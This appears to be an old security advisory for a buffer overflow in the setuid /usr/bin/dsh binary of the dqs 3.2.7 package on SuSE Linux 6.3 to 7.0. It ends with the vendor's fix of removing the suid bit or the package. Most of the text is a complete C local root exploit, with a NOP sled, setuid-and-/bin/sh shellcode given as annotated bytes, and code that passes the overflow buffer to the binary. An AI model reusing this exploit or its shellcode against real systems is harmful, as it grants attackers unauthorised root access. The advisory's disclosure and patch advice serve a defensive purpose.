|
Vulnerability dqs Affected dqs 3.2.7 (SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default) Description 'dex dex' found following. He found a buffer overflow vunerability on the /usr/bin/dsh (dqs 3.2.7 package). If a long line on the first argument is gived, the program gives a SIGSEGV signal. SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default an then it are vunerable, maybe others. You can found the exploit at www.raza-mexicana.org/programas/programas/qsexp.c And here it is: /* - dqsexp.c - */ /********************************************************************/ /* /usr/bin/dsh(dqs 3.2.7 package) local root exploit. */ /* SuSE 6.3, 6.4, and 7.0 are vunerable. */ /* dex@raza-mexicana.org <> http://www.raza-mexicana.org */ /* Saludos: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal, */ /* megaflop y a todo raza. que weba escribirlos todos XD. */ /* En especial saludos al espa~olete(NOP) :P, ya sabes porque. */ /* */ /* - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */ /********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFFSIZE 2772 #define OFFSET 0 #define ALIGN 0 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } static char code[]= /* stolen from mount.c :P */ "\x29\xc0" /* subl %eax, %eax */ "\xb0\x46" /* movb $70, %al */ "\x29\xdb" /* subl %ebx, %ebx */ "\xb3\x0c" /* movb $12, %bl */ "\x80\xeb\x0c" /* subb $12, %bl */ "\x89\xd9" /* movl %ebx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xeb\x18" /* jmp callz */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xe3\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68"; void main(int argc, char **argv) { int i; unsigned long addr; char *buffer; int offset=OFFSET; int buffsize=BUFFSIZE; int align=ALIGN; if (argc > 1 ) offset = atoi(argv[1]); if (argc > 2 ) align = atoi(argv[2]); if (argc > 3 ) buffsize = atoi(argv[3]); buffer = (char *)malloc(buffsize + 8); addr = get_sp() - offset; for(i = 0; i < buffsize; i += 4) { *(long *)&buffer[i] = 0x90909090; } *(long *)&buffer[buffsize - 8] = addr; *(long *)&buffer[buffsize - 4] = addr; memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code)); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"); printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n"); printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n"); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n"); printf("[*] Address=0x%x, Align=%d, Offset=%d\n", addr, align, offset); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n"); printf("[*] Starting....\n"); execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL); } Solution SuSE confirmed this vulnerability and that dqs has the setuid bit on the file /usr/bin/dsh, but the package (as a package in the clustering series) is not installed by default. The fix (to remove the suid bit) is correct. If you have selected to set the variable PERMISSION_SECURITY in /etc/rc.config to "secure local" in SuSE-7.1 (recommended for security-enhanced settings), you are not vulnerable. On SuSE-7.1, in addition to the chmod command below, change the files /etc/permissions.*, too, to reflect the removed suid bit. If you do not need the dqs package, simply remove it using the command rpm -e dqs Of course, SuSE will provide update packages as soon as possible. The original publisher (SCRI, Florida State University) is no longer maintaining DQS or employing the original author, but has also refused to relax distribution restrictions, making it difficult to found a new developer community.